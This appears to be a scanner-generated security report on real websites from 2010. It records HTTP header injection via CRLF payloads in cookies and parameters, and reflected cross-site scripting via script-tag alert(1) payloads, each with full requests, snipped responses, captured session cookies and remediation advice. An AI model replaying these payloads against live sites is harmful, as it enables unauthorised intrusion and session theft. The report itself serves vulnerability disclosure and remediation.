If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload fb682%0d%0aeb8d44f6d4b was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BannerRedirect.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=ae1f471a-36f2-482f-a2a3-bdda364895283FG070; A2=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0fb682%0d%0aeb8d44f6d4b; F1=00UilH0003sY9QVZ; B2=; u2=ae1f471a-36f2-482f-a2a3-bdda364895283FG070; E2=0aPa820ws3084ow80ws509KD820wrZ08.I820wrF08Y5g410s3066N820wrV02Edo41wsd06Bz820wrm0aVX820wsd07l0820wrU077Tg20wr+03sYg410sd0abMm5xos507fto20ws50a4cg410rM02WGSdzosb06IXPy9Ksd09EZ820ws303Mo820wrG04gILHW+s60apK820wrU0bKd820ws504uwg210rm07SK820wrM0bnAwy8ys505sM820wsc09bwg210s909KL820wrB; C3=; u3=1; ActivityInfo=0008uqbh0%5f000g3dbdR%5f; D3=;
The value of the Pos request parameter is copied into the Set-Cookie response header. The payload 25305%0d%0ad8582cf193d was submitted in the Pos parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BannerSource.asp?FlightID=1923520&Page=&PluID=0&Pos=8190\25305%0d%0ad8582cf193d HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=ae1f471a-36f2-482f-a2a3-bdda364895283FG070; A2=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; F1=00UilH0003sY9QVZ; B2=; u2=ae1f471a-36f2-482f-a2a3-bdda364895283FG070; E2=0aPa820ws3084ow80ws509KD820wrZ08.I820wrF08Y5g410s3066N820wrV02Edo41wsd06Bz820wrm0aVX820wsd07l0820wrU077Tg20wr+03sYg410sd0abMm5xos507fto20ws50a4cg410rM02WGSdzosb06IXPy9Ksd09EZ820ws303Mo820wrG04gILHW+s60apK820wrU0bKd820ws504uwg210rm07SK820wrM0bnAwy8ys505sM820wsc09bwg210s909KL820wrB; C3=; u3=1; ActivityInfo=0008uqbh0%5f000g3dbdR%5f; D3=;
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 671ca%0d%0a4758775fddb was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BannerSource.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=ae1f471a-36f2-482f-a2a3-bdda364895283FG070; A2=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0671ca%0d%0a4758775fddb; F1=00UilH0003sY9QVZ; B2=; u2=ae1f471a-36f2-482f-a2a3-bdda364895283FG070; E2=0aPa820ws3084ow80ws509KD820wrZ08.I820wrF08Y5g410s3066N820wrV02Edo41wsd06Bz820wrm0aVX820wsd07l0820wrU077Tg20wr+03sYg410sd0abMm5xos507fto20ws50a4cg410rM02WGSdzosb06IXPy9Ksd09EZ820ws303Mo820wrG04gILHW+s60apK820wrU0bKd820ws504uwg210rm07SK820wrM0bnAwy8ys505sM820wsc09bwg210s909KL820wrB; C3=; u3=1; ActivityInfo=0008uqbh0%5f000g3dbdR%5f; D3=;
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload f3d26%0d%0a75b00643908 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BurstingInteractionsPipe.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=ae1f471a-36f2-482f-a2a3-bdda364895283FG070; A2=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0f3d26%0d%0a75b00643908; F1=00UilH0003sY9QVZ; B2=; u2=ae1f471a-36f2-482f-a2a3-bdda364895283FG070; E2=0aPa820ws3084ow80ws509KD820wrZ08.I820wrF08Y5g410s3066N820wrV02Edo41wsd06Bz820wrm0aVX820wsd07l0820wrU077Tg20wr+03sYg410sd0abMm5xos507fto20ws50a4cg410rM02WGSdzosb06IXPy9Ksd09EZ820ws303Mo820wrG04gILHW+s60apK820wrU0bKd820ws504uwg210rm07SK820wrM0bnAwy8ys505sM820wsc09bwg210s909KL820wrB; C3=; u3=1; ActivityInfo=0008uqbh0%5f000g3dbdR%5f; D3=;
The value of the flv request parameter is copied into the Set-Cookie response header. The payload 5ab67%0d%0a00ff500b54 was submitted in the flv parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4069024%7E%7E0%5EebAdDuration%7E899%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFoldDuration%7E899%7E0%7E1%7E0%7E2%7E0%7E0%5EebVideoPlayDuration%7E18%7E0%7E1%7E0%7E1%7E0%7E0%5EebVideoAssetDuration%7E18%7E0%7E1%7E0%7E1%7E11117176%7E0%5EebVideoFullPlay%7E0%7E0%7E1%7E0%7E1%7E11117176%7E0&OptOut=0&ebRandom=0.7502016185317189&flv=5ab67%0d%0a00ff500b54&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/blog/main/archives/global_cio/index.html;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN?subSection=global_cio
Origin: http://www.informationweek.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the res request parameter is copied into the Set-Cookie response header. The payload 8e592%0d%0a9007e5dc7c was submitted in the res parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4069024%7E%7E0%5EebAdDuration%7E899%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFoldDuration%7E899%7E0%7E1%7E0%7E2%7E0%7E0%5EebVideoPlayDuration%7E18%7E0%7E1%7E0%7E1%7E0%7E0%5EebVideoAssetDuration%7E18%7E0%7E1%7E0%7E1%7E11117176%7E0%5EebVideoFullPlay%7E0%7E0%7E1%7E0%7E1%7E11117176%7E0&OptOut=0&ebRandom=0.7502016185317189&flv=10.1103&wmpv=0&res=8e592%0d%0a9007e5dc7c HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/blog/main/archives/global_cio/index.html;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN?subSection=global_cio
Origin: http://www.informationweek.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 1cada%0d%0a5d5c234479e was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4069024%7E%7E0%5EebAdDuration%7E899%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFoldDuration%7E899%7E0%7E1%7E0%7E2%7E0%7E0%5EebVideoPlayDuration%7E18%7E0%7E1%7E0%7E1%7E0%7E0%5EebVideoAssetDuration%7E18%7E0%7E1%7E0%7E1%7E11117176%7E0%5EebVideoFullPlay%7E0%7E0%7E1%7E0%7E1%7E11117176%7E0&OptOut=0&ebRandom=0.7502016185317189&flv=10.1103&wmpv=1cada%0d%0a5d5c234479e&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/blog/main/archives/global_cio/index.html;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN?subSection=global_cio
Origin: http://www.informationweek.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload bf34f%0d%0aa00cfe1a23b was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72978"><script>alert(1)</script>ab87667034 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /headlines/337784/cloud_connect_launch_pad_finalist_to_showcase_maxiscale_flex_software_platform.html72978"><script>alert(1)</script>ab87667034 HTTP/1.1
Host: 7thspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" > <html> <head> <title>Cloud Connect Launch Pad Finalist to Showcase MaxiScale FLEX Software Platform</title> <meta name="description" CO ...[SNIP]... <form id="7_comments_submit_form" method="post" action="/headlines/337784/cloud_connect_launch_pad_finalist_to_showcase_maxiscale_flex_software_platform.html72978"><script>alert(1)</script>ab87667034#cst" onsubmit="rememberfields()" style="display:none;"> ...[SNIP]...
3.2. http://7thspace.com/headlines/337784/cloud_connect_launch_pad_finalist_to_showcase_maxiscale_flex_software_platform.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbed9"><script>alert(1)</script>d34128e6770 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /headlines/337784/cloud_connect_launch_pad_finalist_to_showcase_maxiscale_flex_software_platform.html?fbed9"><script>alert(1)</script>d34128e6770=1 HTTP/1.1
Host: 7thspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" > <html> <head> <title>Cloud Connect Launch Pad Finalist to Showcase MaxiScale FLEX Software Platform</title> <meta name="description" CO ...[SNIP]... <form id="form2" method="post" action="/headlines/337784/cloud_connect_launch_pad_finalist_to_showcase_maxiscale_flex_software_platform.html?fbed9"><script>alert(1)</script>d34128e6770=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload ae786--><script>alert(1)</script>c1a688e3275 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstractae786--><script>alert(1)</script>c1a688e3275/10/4754/Messaging-Collaboration/research-social-networking.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:40:35 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:40:35 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45985
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ript%3Ealert%281%29%3C%2Fscript%3Ec1a688e3275%2F10%2F4754%2FMessaging-Collaboration%2Fresearch-social-networking.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstractae786--><script>alert(1)</script>c1a688e3275/10/4754/Messaging-Collaboration/research-social-networking.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 4cbf8--><script>alert(1)</script>caa7cf49b0e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/104cbf8--><script>alert(1)</script>caa7cf49b0e/4754/Messaging-Collaboration/research-social-networking.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:00 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:00 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45985
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... script%3Ealert%281%29%3C%2Fscript%3Ecaa7cf49b0e%2F4754%2FMessaging-Collaboration%2Fresearch-social-networking.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/104cbf8--><script>alert(1)</script>caa7cf49b0e/4754/Messaging-Collaboration/research-social-networking.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 52eaf--><script>alert(1)</script>6554ec6cc27 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/10/475452eaf--><script>alert(1)</script>6554ec6cc27/Messaging-Collaboration/research-social-networking.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:06 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:06 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45985
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 3Cscript%3Ealert%281%29%3C%2Fscript%3E6554ec6cc27%2FMessaging-Collaboration%2Fresearch-social-networking.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/10/475452eaf--><script>alert(1)</script>6554ec6cc27/Messaging-Collaboration/research-social-networking.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 305ab--><script>alert(1)</script>dcba560a1d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/10/4754/Messaging-Collaboration305ab--><script>alert(1)</script>dcba560a1d/research-social-networking.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:13 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:13 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45983
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Edcba560a1d%2Fresearch-social-networking.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/10/4754/Messaging-Collaboration305ab--><script>alert(1)</script>dcba560a1d/research-social-networking.html"> ...[SNIP]...
The value of REST URL parameter 5 is copied into an HTML comment. The payload baf9c--><script>alert(1)</script>2532fb38a24 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/10/4754/Messaging-Collaboration/research-social-networking.htmlbaf9c--><script>alert(1)</script>2532fb38a24 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:20 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:20 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45985
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... %3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2532fb38a24&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/10/4754/Messaging-Collaboration/research-social-networking.htmlbaf9c--><script>alert(1)</script>2532fb38a24"> ...[SNIP]...
3.8. http://analytics.informationweek.com/abstract/10/4754/Messaging-Collaboration/research-social-networking.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8b59d--><script>alert(1)</script>ea486472576 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/10/4754/Messaging-Collaboration/research-social-networking.html?8b59d--><script>alert(1)</script>ea486472576=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... Cscript%3Ealert%281%29%3C%2Fscript%3Eea486472576%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/10/4754/Messaging-Collaboration/research-social-networking.html?8b59d--><script>alert(1)</script>ea486472576=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 58d2b--><script>alert(1)</script>8691f40a2e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract58d2b--><script>alert(1)</script>8691f40a2e4/14/4774/Regulatory-Compliance/strategy-compliance.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:40:33 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:40:37 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45967
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... -%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E8691f40a2e4%2F14%2F4774%2FRegulatory-Compliance%2Fstrategy-compliance.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract58d2b--><script>alert(1)</script>8691f40a2e4/14/4774/Regulatory-Compliance/strategy-compliance.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 47164--><script>alert(1)</script>d17787e4872 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/1447164--><script>alert(1)</script>d17787e4872/4774/Regulatory-Compliance/strategy-compliance.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:00 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:00 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45967
